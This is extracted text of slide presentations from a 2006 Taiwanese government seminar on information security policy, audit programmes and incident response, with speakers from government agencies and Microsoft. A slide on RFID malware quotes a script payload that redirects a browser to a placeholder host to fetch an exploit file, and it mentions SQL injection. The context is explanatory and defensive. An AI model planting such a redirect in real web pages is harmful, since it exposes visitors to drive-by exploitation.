活動資料 - 資通安全研發中心- 國立成功大學

組織改造與強化資通安全之對策研討會議程 

目前正在積極推動政府改造 , 將整併及精簡現有的政府組織 , 朝向更為有效率及效能的廉能政府。 

由於組織架構的變動 , 資訊安全的相關工作勢必也須要隨著業務及組織而有所更動與調整 , 本研討會 

邀請學者專家一同就組織改造與強化資通安全的相關議題與對策進行討論與座談 , 期望藉由相關的專 

家激盪出在組織改造的同時促進及強化整體資通安全之對策。 

指導單位 : 行政院科技顧問組 

主辦單位 : 成功大學資通安全研發中心 

協辦單位 : 行政院研究發展考核委員會、法務部、內政部資訊中心、主計處電子資料處理中心、 

台北縣政府、台灣微軟股份有限公司 

日期 :2006 年 4 月 14 日 ( 星期五 )。 

地點 : 台大醫院國際會議中心 402AB 會議室 

台北市中正區徐州路二號 

時間項目邀請演講之專家主持人 

09:00~09:20 報到 

09:20~09:30 

賴教授溪松 

開幕 

陳副主任委員俊麟 

09:30~10:00 專題演講主題 : 

資安政策 

行政院科技顧問組 

陳主任如芬 

行政院研考會 

陳副主任委員俊麟 

10:00~10:30 專題演講主題 : 

由 RFID 探討我國資訊 

安全策略之建議 

10:30~10:50 茶敘 

10:50~11:20 專題演講主題 : 

資通安全稽核現況 

行政院國家資通安全會報 

技術服務中心 

劉主任培文 

主計處電子資料處理中心 

李分析師茂基 

內政部資訊中心 

沈主任金祥 

主計處電子資料處理中心 

劉副主任勝東 

11:20~11:50 專題演講主題 : 

組織改造資訊整合之資 

安案例探討 

11:50~13:30 午餐 

13:30~14:00 專題演講主題 : 

規劃集中型資安環境之 

經驗分享 ─ 以台北縣政 

府為例 

14:00~14:30 專題演講題目 : 

網站安全與滲透測試 

台灣微軟股份有限公司 

(Microsoft ) 

史經理百誠 

胡經理士亮 

台北縣政府資訊中心 

謝主任翠娟 

成大電機系 


14:30~14:50 茶敘 

專題演講題目 : 

14:50~15:20 法務部資安工作經驗分 

享 

座談會主題 : 

15:20~16:20 組織改造與強化資通安 

全之對策 

會議網站 :http://www.icsc.ncku.edu.tw/seminar/ 

法務部資訊處 

陳處長泉錫 

陳如芬主任、陳泉錫處長、 

何全德處長、劉勝東副主 

任、謝翠娟主任 




林副處長裕權 




何處長全德 


賴教授溪松

組織改造與強化資通安全對策研討會 

政府機關推動 

資訊安全之挑戰 



2006 年 4 月 14 日 

大綱 

一、前言 

二、從案例看資安風險 

三、政府作為 

四、現階段推動資通訊安全挑戰 

五、掌握關鍵成功因素 

六、結語 

2 

1


資安威脅典範移轉 

木馬 

病毒蠕蟲混種垃圾郵件間諜軟體 

木馬 

• 病毒、蠕蟲、竊取、竄改 … 

• 網頁的覆蓋 (2001) 

• 2001.04.30 21:00 中美駭客大戰 

• 自動化病毒 (2001 迄今 ) 

• 情資的竊取 (2002 迄今 ) 

• 「嘗試錯誤法」侵入他人帳號 

• 防火牆的突穿 

• 情資的竄改 

3 

威脅來源 

• 人為威脅 83%~85% , 天然威脅 15%~17% 

• 內部威脅約 75%, 外部威脅約 25% 

• 內部威脅 

• 較不容易的攻擊 ( 約十倍的困難 ) 

• 疏失 ( 組態錯誤、管理鬆散、犯錯失誤 ) 

• 外部威脅 

• 78% 來自網際網路連線 

• (1999 佔 57%) 

資料來源 :FBI 相關研究報告 

4 

2


資訊安全 

人人有責 

系統管理者 

/ 資訊人員 

CIO 

每一個人 

系統控管 

保護資源 

安全 

保護資料 

隱私 

資訊安全 

保護資訊 

時間、認知、法律 

5 

從案例看資安風險 

專案 

事 

件 

通 

報 

影響 

範圍 

事 

件 

處 

置 

A 

A 機關收到偽冒身 

分電子郵件通報技 

術服務中心 , 經鑑 

識分析後發現該郵 

件中夾藏後門程式 

超過 40 台電腦遭 

入侵 

協助 A 機關立刻利 

用防火牆系統阻斷 

駭客連線 , 受害設 

備已完成作業系統 

重新安裝 

B 

B 機關發現資安 

事件通報技術服 

務中心協助處理 

2 部對外服務的 

Web 主機遭入侵 

協助 B 機關針對 

網路架構及管理 

機制提出改善建 

議 

C 

由 A 專案事件資料關聯 

性發現 ,C 機關已遭入 

侵 

超過 70 台電腦遭入侵 , 

其中 3 台為伺服器主 

機 ; 被竊資料與國際合 

作事宜相關 

已協助 C 機關立刻建立 

中繼站黑名單阻擋機 

制 , 並持續過濾內部其 

他設備 

D 

由惡意電子郵 

件分析 , 技術 

服務中心前往 

駭客中繼站進 

行網路側錄 

經分析側錄資 

料發現 ,D1 機 

關超過 100 台電 

腦遭入侵 ,D2 

機關超過 200 台 

電腦遭入侵 

立即通知 D1 及 

D2 機關 , 並提 

供技術協助 

6 

3


國家資通安全會報 

• 2000.08.30 總統核定「建立我國通資訊基礎建設安 

全機制」 

• 2001.01.17 行政院會通過「建立我國通資訊基礎建 

設安全機制計畫」 

• 成立國家資通安全會報 , 提高資通安全決策層次 , 

編組專職人員統合推動協調相關工作 

• 2004.03 行政院會通過第二期機制計畫 

7 

我國資通安全發展願景 

確保我國擁有安全、可信賴的資訊通訊環境 

建立國家資通安全事件通報 

及危機應變體系 

健全國家資通安全防護能力 

強化國家資通安全認知 

與訓練推廣作業 

確保國家資通安全 

及促進國際合作 

8 

4


重要政策 

1. 資訊安全責任等級分級 

2. 重要民生基礎建設資通安全保護 

3. 推動稽核制度 

4. CISO 資訊安全長責任制度 

9 

資訊安全責任等級分級 

作業 

\ 

等級 

防禦機 

制強度 

防護縱深 

ISMS 推動作 

業 

稽核方式 

資安教育訓練 ( 主 

官、主管、技 

術、一般 ) 

專業證照 

A 級 

強度等 

級 4 

NSOC/SOC,ID 

S, 防火牆 , 防毒 

96 年通過第 

三者認証 ( 註 

二 ) 

每年至少 

執行二次 

內稽 

(4,6,18,4 小時 )/ 

每年 

96 年資安專 

業鑑定二張 

( 註三 ) 

B 級 

強度等 

級 3 

SOC(OP),IDS, 

防火牆 , 防毒 

97 年通過第 

三者認証 

每年至少 

執行一次 

內稽 

(4,6,16,4 小時 )/ 

每年 

96 年資安專 

業鑑定一張 

C 級 

D 級 

強度等 

級 2 

強度等 

級 1( 註 

一 ) 

IDS, 防火牆 , 防 

毒 

防火牆 , 防毒 

各單位自行成 

立推動小組規 

劃作業 

推動 ISMS 觀 

念宣導 

自我檢視 

自我檢視 

(2,6,12,4 小時 )/ 

每年 

(1,4,8,2 小時 )/ 每 

年 

資安專業訓 

練 

資安專業訓 

練 

10 

5


重要民生基礎建設資通安全保護 

• 選定重要基礎建設資訊 

系統 

• 政府、安全、金融服務、能 

源設施、供水、電信郵政、 

交通運輸、醫療保健 

• 由主管機關督導目的事 

業機構落實執行保護措 

施 

• 建立資安資訊分享與分 

析中心 (ISAC) 

11 

建立資安資訊分析與分享中心 

• 逐步推動重要核心政府機關及關鍵民生基礎建設 ( 每年 

1~2 個 ) 建立 ISAC 

• 政府與民間合作 

資料來源 :http://www.cisco.com/... 

12 

6


推動稽核制度 

• 完備政府機關稽核制度 

• 建立內部稽核制度 

• 將資安內稽列為年度例行資安工作重點 

• 主管機關及重要資訊單位率先實施 

• 深化內部稽核制度 , 要求所屬單位落實執行 

• 透過外部稽核檢討評估與持續改善 

• 建立目的事業單位稽核制度 

13 

CISO 資訊安全長責任制度 

• 各單位負責本身資安責任 

• 由副首長擔任 CISO 資訊安全長 , 協助首長善 

盡維護資安的責任 

• 成立資通安全處理小組 , 指派專人控管資安 

• 落實公務機密維護 

• 確實評估資訊資產 

• 培育人才、提升認知與培養防護能力 

• 在資訊預算中編列適當比例資安預算 , 並列為最優先 

納入年度預算內 

14 

7


現階段推動資通訊安全挑戰 

• 管理鬆散 

• 資訊 ( 安 ) 人力不足、專業待加強 

• 預算不足 

• 使用者認知、警覺性不夠及行為未落實 

• 主導稽核員人力未充分再訓練與運用 

藉由高階管理階層的支持與推動 , 克服挑戰 ! 

15 

結語 

• 掌握關鍵成功因素 

• 反映單位施政 ( 營運 ) 目標的資通安全政策 

• 與組織文化一致的實施方法 

• 管理階層明顯的支持與承諾 

• 清楚了解需求 

• 將資通安全概念有效傳達給管理者與員工 

• 讓員工與承包商知悉資安政策與標準 

• 適當的訓練與教育 

• 評估測試與持續改善 

資料來源 :BS7799-2:2002, 綜合規劃組整理 

16 

8


Thank You 

9

C 

組織改造與強化資通安全之對策研討會 

從 RFID 簡探報討格式資安策略 

技術服務中心 

劉培文博士 

國家資通安全會報技術服務中心 

Dec. 劉培 15, 文主 2004 任 

Apr. 14, 2006 

1 

C 

Is Your Cat Infected with 

a Computer Virus 

• 荷蘭 Vrije 大學 (Melanie R. Rieback et al.) 在 IEEE 

PerCom06 發表了本篇引起廣泛討論之論文 

• 本篇論文提出的主要論點包括 

– 儲存在 RFID 標籤中的資料可被用來攻擊後端軟體系統 

– 首隻可自我複製之 RFID 病毒 POC (Proof-of-Concept), 以 

RFID 標籤配合 SQL Injection 進行危害及傳播 

– RFID 中繼軟體 (middleware) 的發展者應建立適切的資料檢 

查機制 , 以避免 RFID 中繼軟體產生網際網路上著名的常 

見弱點 

2

C 

RFID 惡意軟體測試平台 

• 此測試環境利用之弱點 

– 資料庫 

• SQL Injection 

– Web-based 元件 (client-side scripting 或 SSI) 

• document.location='http://ip/exploit.wmf'; 

• 

– Glue code connects reader to middleware 

• buffer-overflow 

3 

C 

Deploy Now, Secure Later or Never 

With respect to the students involved, the paper as 

presented is rather weak. The 'real' virus, they claim to 

demonstrate in the paper, is not a virus, just a selfreplicating 

piece of SQL code. 

Kevin Ashton, VP, ThingMagic 

co-founder of MIT Auto-ID Center 

Companies need to provide multi-level security and take 

responsibility for testing before releasing applications to the 

market 

Julie England, VP,Texas Instruments 

4

C 

風險生命週期 

• 風險 = 價值 x 威脅 x 弱點 x 發生的機率 

5 

Source: Nick Ellsmore, “Security Fatigue: Threatening The Culture of Security”, 

APEC/OECD Security Workshop Seoul, Korea, Sep. 5-6, 2005 

C 

網路化社會的風險實例 

6 

• 價值 (Value) 

– 個人資訊、商業資訊、公務機密 

– 美國 FTC 估計每年有 3 百 20 萬人 ID 遭到竊取 

– 根據賽門鐵克表示 , 濫發電子郵件者或網路釣魚人士 

出租一個有大約 5,500 台殭屍電腦 (Zombie) 的網路 , 每週 

租金約為 350 美金 

• 威脅 (Threat) 

– 23% 美國民眾每月遭受網路釣魚 (phishing) 攻擊 

– Zero-day Attack (e.g. MS05-036) 

– 而從去年 Sasser 大規模爆發後 , 網路大規模攻擊轉趨沈 

寂 , 使用端安全防護需求日漸提高 , 駭客的動機已從 

出名轉向真正的錢財

C 

網路化社會的風險實例 

7 

• 弱點 (Vulnerability) 

– CERT/CC 通報之弱點數 

– 無線網路的設定與管理 

• 沿台北市東區至火車站 , 四天共偵測到 460 個無線網路 AP, 其中僅 182 

個使用 WEP 加密 

– 人性弱點 (e.g. 遭受網路釣魚的美國民眾 , 有 70% 相信郵件的真實性 ) 

• 發生機率 (Probability) 

– 今年我國整體產業連網普及率達到 83%, 各項基礎網路應用中 , 又 

以無線區域網路 (WLAN) 普及率成長最顯著 , 接近 20% 

– 現行 IPv4 最多只能容納 2 32 個 IP 數 , 但 IPv6 的 IP 數則可高達 2 96 

– Ubiquitous Network Society 的 5 Any (Any-Time, Any-Where, Any-Network, 

Any-Device, Any-Service) 

C 

資訊安全威脅趨勢 

Means 

How To 

Objects 

What To 

SPAMs 

Viruses 

Trojan 

Horses 

Phishing 

Worms 

BOTs 

ID Fraud 

Hack 

for Fun 

Exploit 

for Money 

8

C 

網路犯罪之轉變趨勢 

• “Tech Freaks” to “Propaganda” to “Fraud on Net” 

Damages 

Attacker 

Attacker’s Objectives 

9 

Real Damages 

Loss of Data 

Systems Compromise 

Systems Down 

Network Crash 

Web Compromise 

Business Halt 

ID Theft 

Monetary Damages 

Viruses 

Worms 

Trojan Horses 

BOTs 

Phishing 

ID Frauds 

Fun 

Fame 

In the Dark Side 

Political 

Messaging 

Becoming 

Someone Else 

Stealing 

Goods & Money 

C 

網路攻擊時間大幅縮短 

Security Bulletin 

MS02-039 

039 

MS03-026 

026 

MS03-039 

039 

MS03-049 

049 

MS04-011 

011 

MS05-039 

039 

Announcement 

(yy/mm/dd) 

2002/7/29 

2003/7/17 

2003/9/11 

2003/11/12 

2004/4/14 

2005/8/10 

Lead 

time 

58 days 

10 

4 

1 

11 

2 

Exploit code 

Emergence 

(yy/mm/dd) 

2002/9/25 

2003/7/27 

2003/9/15 

2003/11/13 

2004/4/25 

-2005/8/12 

Lead 

time 

4 mo 

16 

days 

5 mo 

2 mo 

6 days 

1 

day 

1 st Attack 

Occurrence 

2003/1/25 

SQL Slammer 

2003/8/12 

Blaster 

2004/2/11 

Welchia.B 

2004/2/11 

Welchia.B 

2004/5/1 

Sasser 

2005/8/13 

Zotob 

10 

rapidly reducing

C 

美國 CERT/CC 歷年弱點通報數 

11 

C 

資訊安全整體 SWOT 分析 

S 

‧ 資訊安全漸成全球共識 

‧ 全球資安市場已漸成形 

‧ 消費者保護意識逐漸抬頭 

‧ 使用者資訊能力逐年提升 

SWOT 

‧ 網際網路存在許多弱點 

‧ 資訊系統弱點層出不窮 

‧ 使用者不了解資訊風險 

‧ 資安投資整體比例仍低 

W 

12 

‧ 各國相繼投入資訊建設 

‧ 下一代網際網路逐漸成形 

‧ 資訊安全相關國際標準 

‧ 法令規章環境逐漸改善 

O 

‧ 隱私權保護問題日益嚴重 

‧ 駭客犯罪目標轉變 

‧ 網路犯罪工具取得容易 

‧ 電腦病毒爆發時間縮短 

T

C 

資訊安全整體 SWOT 策略 

13 

外部環境 

內部環境 

機會 (O) 

• 各國相繼投入資訊建設 

• 下一代網際網路逐漸成形 

• 資訊安全相關國際標準 

• 法令規章環境逐漸改善 

威脅 (T) 

• 隱私權保護問題日益嚴重 

• 駭客犯罪目標轉變 

• 網路犯罪工具取得容易 

• 電腦病毒爆發時間縮短 

優勢 (S) 

• 資訊安全漸成全球共識 

• 全球資安市場已漸成形 

• 消費者保護意識逐漸抬頭 

• 使用者資訊能力逐年提升 

SO 策略 

• 加速推動下一代安全網路 

• 健全資安相關法令規章 

• 安全可信任電子商務環境 

• 建立使用者網路行為準則 

ST 策略 

• 強化電腦犯罪防治能力 

• 跨國資安事件處理機制 

• 建立資安防禦縱深觀念 

• 資安產業推動計畫 

劣勢 (W) 

• 網際網路存在許多弱點 

• 資訊系統弱點層出不窮 

• 使用者不了解資訊風險 

• 資安投資整體比例仍低 

WO 策略 

• 發展安全之通訊協定 

• 推動資訊安全管理 

• 資訊安全產品認驗證 

• 提升使用者資安認知 

WT 策略 

• 資訊系統安全確保 

• 推動企業資訊安全治理 

• 落實軟體安全工程訓練 

• 建立資安風險評估制度 

C 

How can we fly to NY 

safely? 

飛安 vs. 資安 

CKS 

Management 

- Airplane navigation 

- System administration 

- Airplane maintenance 

- System maintenance 

- Training pilots pilots 

- Training staff staff 

-Aviation service 

-IT -IT service 

- Compliance 

- Compliance 

JFK 

ISMS (2002.4-), Information 

Security Audit (2003.4-), 

Information Security 

Governance (2005.3-) 

Airline case Information system case Evaluation / Assurance system 

Certification of of body: 

-Body strength 

Type Type certification of of Engines 

- Capability of of airplane 

-Performance of of Engines 

-Strength of of parts parts 

-Output of of Energy 

Secure 

Secure body, 

core 

parts, and 

module 

functions 

Certify: 

- Implementation of of Cryptographic 

- Secure IT IT products / systems 

Algorithms 

- Security Functions / capabilities 

- Security of of Cryptographic modules 

- Effectiveness of of Cryptographic 

algorithms 

Common Criteria 

(ISO/IEC15408) IT IT Security 

Cryptographic 

Evaluation & Certification 

Algorithms Validation Program (CAVP) 

Cryptographic 

Scheme (2001.4-) 

Module Validation Program (CMVP) 

14 

CRYPTREC (2000.4-)

C 

推動企業資訊安全治理 

• 公司治理 

– 公司治理主要著眼於企業所 

有與企業經營分離之現代公 

司組織體系下 , 如何透過法 

律的制衡管控設計 , 有效監 

督企業的組織活動 , 以及如 

何健全企業組織運作 , 防止 

脫法行為之經營弊端 

• 應研究如何使企業資訊安 

全治理成為公司治理的一 

環 

15 

C 

資訊安全風險評估 

• Example 

– 日本 IPA 所發展之自我評估基準 (benchmark) 

Information 

Security 

Countermeasures 

Scoring 

You are 

here 

X 

X: Information Security is not immediately requisite 

: Moderate level of Information Security is expected 

: High level of Information Security is required 

16 

Volatility of Business Nature against Information Security 

+ Significance of Social Involvement

C 

安全文化構面 

資訊安全整體策略地圖 

提升使用者資安認知 

落實軟體安全工程訓練 

建立使用者網路行為準則 

企業流程構面 

推動資訊安全管理 

推動企業資訊安全治理 

建立資安風險評估制度 

安全可信任電子商務環境 

資安產業構面 

發展安全之通訊協定 

建立資安防禦縱深觀念 

資訊安全產品認驗證 

資訊系統安全確保 

政府責任構面 

17 

跨國資安事件處理機制 

強化電腦犯罪防治能力 

資安產業推動計畫 

健全資安相關法令規章

資安稽核服務推動簡報 

行政院主計處電子處理資料中心 

分析師李茂基 

電子信箱 :mjlee@dgbas.gov.tw 

電話 :23803859 

中華民國九十五年 

1 

報告大綱 

壹、資安外部稽核 

一、辦理依據 

二、稽核目的 

三、稽核規劃 

四、資安整體準備情形統計表 

五、稽核檢討 

貳、資安內部稽核 

一、緣起 

二、推動目的 

三、推動策略 

四、結果說明 

2

) 

) 

壹、資安外部稽核 

一、辦理依據 

依據九十一年六月六日行政院院長核定第二次修 

訂「建立我國通資訊基礎建設安全機制計畫」 

3 

國家資通安全 

諮詢委員會 

行政院國家資通安全會報組織架構 


總召集人 : 副院長兼執行長 : 科技顧問組執行秘書兼 

副總召集人 : 林政務委員逢慶兼 

副執行長 : 主計處電子中心主任兼 

研考會主委兼 

國防部派員兼 

委員 : 部會及直轄市副首長兼研考會資管處長兼 

標準規範組 

( 經濟部 ) 

研考會、國防部 

交通部、財政部 

稽核服務組 

( 主計處 ) 

國防部、交通部 

經濟部、財政部 

法規偵防組 

( 法務部 ) 

內政部、國防部 

交通部 

資訊蒐集分 

析組 

( 國科會 ) 

中科院、工研院、資 

策會、相關公協會、 

民間業者 

通報應變組 

( 研考會 ) 

主計處、內政部、國防部、 

交通部、財政部、經濟部、 

教育部、衛生署 

綜合規劃組 

( 科顧組 ) 

事 

業 

機 

構 

衛 

分 

生 

組 

署 

( 四 

事 

業 

機 

構 

分 

財組 

政 

部 ║ 

一 

事 

業 

機 

構 

交 

分 

通 

組 

部 

( 二 

事 

業 

機 

構 

經 

分 

濟 

組 

部 

( 一 

) 

) 

) 

事 

業 

機 

構 

分 

金組 

管 

會 ║ 

二 

( 三 

( 三 

學 

術 

機 

構 

教分 

育組 

部 

行 

政 

機 

研 

構 

考 

分 

會 

組 

國 

防 

體 

國 

系 

防 

分 

部 

組 

技 

術 

服 

研務 

考中 

會心

行政院國家資通安全會報組織架構 

國家資通安全 

諮詢委員會 


總召集人 : 副院長兼執行長 : 科技顧問組執行秘書兼 

副總召集人 : 林政務委員兼 

副執行長 : 主計處電子中心主任兼 

副總召集人 : 研考會主委兼 

國防部派員兼 

委員 : 部會及直轄市副首長兼研考會資管處長兼 

標準規範組 

( 經濟部 ) 

稽核服務組 

( 主計處 ) 

法規偵防組 

( 法務部 ) 

資訊蒐集 

分析組 

( 國科會 ) 

通報應變組 

( 研考會 ) 

綜合規劃組 

( 科顧組 ) 

工作重點 

資安稽核服務推廣與訓練 

‧ 現場深度訪視 ‧ 稽核實務說明會 

‧ 稽核作業標準 ‧ 主管稽核講習 

‧ 稽核自我檢視 ‧ 稽核 / 非稽核人員講習 

‧ 資安風險評估 ‧ 培訓稽核種子人力 

‧ 電話 / 線上諮詢 ‧ 稽核作業研討會 

二、稽核目的 

為瞭解重要單位 ( 含公民營機構 ) 對資通安全 

重視及因應情形 , 透過外部稽核作業 , 協助各 

單位加強落實各項安全防護措施 , 並及早發現 

資安問題 , 訂定因應策略及預防措施 , 以降低 

資安事件發生機率。 

6

三、稽核規劃 

( 一 ) 籌組資安稽核服務團 

邀請國防部、交通部、經濟部、財政 

部、國科會、工研院、資策會、電信研 

究所、相關公協會等派員或推薦學者、 

專家及相關業者等組成資安稽核服務 

團。 

7 

資安稽核服務團成員 

學者專家 : 中研院、清大、交大、中興、成 

大、警大、台科大、東海、逢甲、 

文化。 

業界代表 : 趨勢科技、賽門鐵克、諮安科技、 

英國標準協會、勤業會計師、致遠 

會計師、安侯建業會計師。 

政府機關 : 國防部、研考會、國科會、國家資 

通安全會報技術服務中心 

8

( 二 ) 資安稽核範圍及項目 

依據「行政院及所屬各機關資訊安全管理要點 

及規範」、參考國際及國內資訊安全有關標準 

如 ISO/IEC27001、BS7799-2:2005、CNS17800 等 

標準 , 規劃設計資通安全稽核項目及範圍 , 計 

分為風險評鑑與管理、資訊安全政策、資訊安 

全組織、資產管理、人力資源安全、實體與環 

境安全、通訊與作業管理、存取控制、資訊系 

統取得 , 開發及維護、資訊安全事故管理、營 

運持續管理及遵循性等十三大項 , 逐項進行稽 

核。 

9 

( 三 ) 稽核進行程序 

進行 

查核前的 

準備工作 

在受查單位 

進行 

查核前會議 

填寫外部稽核表 

彙整相關文件備查 

稽核人員先行審閱資料 

受查單位 

提供資料與 

準備受測環境 

對每一分項 

進行查核 

查核意見 

與 

受查單位說明 

預計進行時間 : 四至六小時 

查核後會議 

查核結果與 

意見交換 

10

填表單位 : 

資通安全外部稽核 ( 自我評審 ) 表 

查核項目 

1 風險評鑑與管理 ( 資訊安全組織、業務及資訊單位 ) 

1.1 是否鑑別適用範圍內之所有資訊資產以及其擁有 

者 ? 

1.2 是否鑑別所有資產可能遭遇之威脅 ? 

1.3 是否鑑別所有資產可能之脆弱點 ? 

1.4 是否鑑別資產可能因威脅發生而喪失機密性、完整 

性與可用性之衝擊 ? 

1.5 是否評鑑因發生安全事件而可能對組織造成之傷害 

及產生之後果 ? 

1.6 是否評鑑安全事件發生之可能性或機率 ? 

1.7 是否評鑑所有資產可能發生之風險值 ? 

1.8 是否確定組織可接受風險之等級 ? 

1.9 是否評鑑出所有可降低風險之控制措施 ? 

1.10 對於需要控管之風險是否依其重要性決定其處理 

之優先順序 ? 

1.11 是否制定風險處理計畫並根據該計畫導入控制措 

施以降低風險 ? 

1.12 是否建立系統異常、病毒及入侵等資安事件之監控 

機制 ? 

1.13 是否有書面的風險評鑑報告 ? 

1.14 是否有訂定文件管制程序以確保所有與資訊安全 

管理系統相關之文件及紀錄皆受到適當之保護與 

管制 ? 

1.15 所鑑別出風險之可接受等級是否由管理階層決 

定 ? 

填表日期 : 年月日 

自我評審查核員評量 

是否 

□ 

□ 

□ 

□ 

不 

適 

用 

完整性 

尚 

屬 

非 

常 

不 

盡 

不 

適 

用 

□ □ □ □ □ □ □ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ □ □ □ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ 

□ □ □ □ □ □ □ 

□ □ □ □ □ □ □ 

□ □ □ □ □ □ □ 

□ □ □ □ □ □ □ 

□ □ □ □ □ □ □ 

11 

四、資通安全整體準備情形統計表 

年度別 

非常完整 (%) 

尚屬完整 (%) 

不盡完整 (%) 

90 年度 

39% 

48% 

13% 

91 年度 

34% 

52% 

14% 

92 年度 

37% 

61% 

2% 

93 年度 

57% 

43% 

0% 

94 年度 

52% 

48% 

0% 

12

五、稽核檢討 

( 一 ) 資訊安全政策 : 審查與評估。 

( 二 ) 實體與環境安全 : 財產攜出。 

( 三 ) 通訊與作業管理 : 可攜式設備管理、資料備 

份、日常日誌。 

( 四 ) 存取控制 : 行動式電腦作業與遠距工作。 

( 五 ) 資訊系統取得、開發及維護 : 變更管制、木馬及後門 

程式檢測。 

( 六 ) 資安事故管理 : 從資訊安全事故中學習。 

( 七 ) 營運持續管理 : 業務衝擊分析、計畫測試演練 

與維護、教育訓練。 

( 八 ) 遵循性 : 系統稽核。 

13 

貳、資安內部稽核推動報告 

一、緣起 

‣ 稽核發現 , 多數單位尚未辦理完整性資安內 

部稽核。 

‣ 依據「行政院及所屬各機關資訊安全管理要 

點」第 36 條規定 , 各機關應確立系統稽核項 

目 , 建立資訊稽核制度 , 定期或不定期進行 

資訊安全稽核作業。 

14

二、推動目的 

‣ 協助機關檢視資安政策及控制措施切合需要 

且具體有效。 

‣ 稽核結果做為機關資安政策檢討評估及矯正 

改善依據。 

‣ 為加強各機關建立資安稽核制度。 

‣ 加強員工落實執行資安規定。 

15 

三、推動策略 

‣ 舉辦資安稽核訓練研討會。 

‣ 設計資安稽核相關表單。 

‣ 選定主管機關及重要資訊單位列為當年度推 

動執行單位。 

‣ 以後年度由主管機關推動至所屬單位 , 全面 

施行。 

16

四、結果說明 

‣ 上年度推動資安內稽單位含政府部門及民間 

企業計 127 個單位。 

‣ 25 個單位已通過資安認證。 

‣ 以下就資產風險評鑑辦理情形、稽核主辦單 

位統計、稽核結果統計、綜合意見及建議等 

分別報告。 

17 

資產風險評鑑辦理情形 

未辦理 

25% 

已完成 

46% 

進行中 

29% 

已完成 

進行中 

未辦理 

18

資安內稽執行單位統計 

其他 

3% 

政風及資訊 

合辦 

9% 

稽核小組 

政風單位 

資訊單位 

其他 

政風及資訊合辦 

資訊單位 

25% 

政風單位 

9% 

稽核小組 

54% 

19 

資通安全準備情形 

尚待加強 

4% 

尚未辦理 

0% 

非常完整 

46% 

尚屬完整 

50% 

非常完整 

尚屬完整 

尚待加強 

尚未辦理 

20

資通安全準備情形統計表 ( 依項目別 ) 

項目 

非常完整尚屬完整不盡完整尚未辦理 

家數 

百分 

比 

家數 

百分 

比 

家數 

百分 

比 

家數 

百分 

比 

資訊安全政策 104 82% 12 9% 6 5% 5 4% 

資訊安全組織 100 79% 17 13% 8 6% 2 2% 

人員安全管理 98 77% 22 17% 5 4% 2 2% 

資產分類 

與控制 84 66% 23 18% 12 9% 8 6% 

實體及環境 

安全管理 102 80% 18 14% 6 5% 1 1% 

通訊與作業 

控制 104 82% 19 15% 4 3% 0 0% 

存取控制 97 76% 23 18% 5 4% 2 2% 

系統開發 

與維護 97 76% 22 17% 4 3% 4 3% 

營運持續管理 82 65% 19 15% 12 9% 14 11% 

符合性 99 78% 14 11% 9 7% 5 4% 

稽核意見 

1) 文件與記錄管理應加強 , 如記錄表單增設 

管理監督功能欄位及處理時間記錄。 

2) 事件通報之後續矯正改善措施 , 應建立追 

踪管制機制。 

3) 備援機制及備份資料 , 應定期進行實際演 

練測試。 

4) 委外合約中應增加廠商資安工作需求及對 

廠商實施資安責任稽核權利。 

22

稽核意見 

5) 人員異動時 , 其存取權限應即時異動。 

6) 對於具有特殊權限之使用者 , 應定期稽核其 

使用情況。 

7) 對於委外廠商人員、第三方使用者、工讀生 

或支援志工等使用資訊人員 , 應作風險評估 

並實施安全保護措施。 

8) 資訊資產安全等級應列入資產清冊納管。 

23 

稽核意見 

9) 可攜式資訊設備或私人資訊設備之管理 , 有 

待加強 ; 電腦設備報廢後 , 相關資料移除程 

序宜再嚴謹。 

10) 資安稽核工作宜列入年度計畫定期實施。 

24

結語 

資安管理成功的關鍵因素 

一、管理階層實際的支持與承諾 

二、正確的風險評鑑與有效的控制措施 

三、全體員工的認知與實踐 

四、資安政策要定期審查與評估 

五、不定期的稽核 

25 

報告結束 

敬請指教 

26

組織改造資訊整合之資安案 

例探討 

史百誠 

資深產品行銷經理 

Server Platform Business 

Group 

台灣微軟 

胡士亮 

平台架構技術副理 

開發工具暨平台推廣處 

台灣微軟 

內容大綱 

微軟 IT 環境介紹 

安全策略 

使命與願景 

資訊安全原則 

風險決策模型 

戰術項目 

企業風險與解決方案 

資訊安全組織架構 

總結 

2 

© 2005 Microsoft Corporation. All rights reserved. 

This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Microsoft IT 環境 

• 300,000+ PCs 

devices 

• 104,000+ e-mail e 

server accounts 

• Single 

Instance SAP 

(1.9Tb Db) 

Redmond 

Tukwila 

Silicon Valley 

• 89,000 end users 

• 83 countries 

Charlotte 

Dublin 

Singapore 

• 403 

buildings 

• 9.5M+ remote 

connections/month 

• 3M+ e-mail e 

messages per 

day internally 

• 99.99% availability 

3 

Microsoft 資訊安全概況 

資安概況 

每月 10 萬次以上的攻擊 / 弱點掃描 

每天超過 100 萬封以上的垃圾郵件 

挑戰 

企業文化允許個人自理與最大使用彈性 

大量的行動裝置 

(Notebook/PDA/Smartphone/Home) 

獨特的 IT 環境來因應產品開發 / 測試 / 支援 

的特殊資訊安全需求 

大部份的微軟員工對資訊技術非常熟悉且 

常常追求軟體功能的極限以改善產品品質 

4 



微軟資訊安全策略 

公司資訊安全 




戰術優先項目 

5 

公司資訊安全 





維運原則 

評估風險 

透過系統化的評估、溝通並 

降低資訊資產風險以避免惡 

意或未授權的使用造成微軟 

智慧財產權或生產力的損失 

稽核 

定義 

政策 

監控 

6 



公司資訊安全願景 




維運原則 

IT 環境包括服務、應用程式與基礎架構來提供高可用性、隱密 

與安全的服務給所有用戶 

主要客戶保障包括 

我的身分不會被冒用 

資源是安全而且可用的 

個人資料與傳輸的隱私 

明確定義角色與責任 

即時的回應風險與威脅 

7 


管理階層的承諾 

依據企業目標來管理風險 

定義組織角色與責任 

使用者與資料 

使用最低權限原則管理 

嚴格執行個人隱私與個人識别訊息保護 

應用程式與系統開發 

在整個開發生命週期中強化資訊安全 

分層防禦並降低被攻擊面積 

維護與營運 

資訊安全整合到維運架構中 

監控、稽核與回應 




維運原則 

8 



企業風險模型 



維運原則 


High 

風險與影響 

(Defined by Business Owner) 

Acceptable Risk 

Unacceptable Risk 

Risk assessment drives 

to acceptable risk 

Low 

Low 

資產價值 

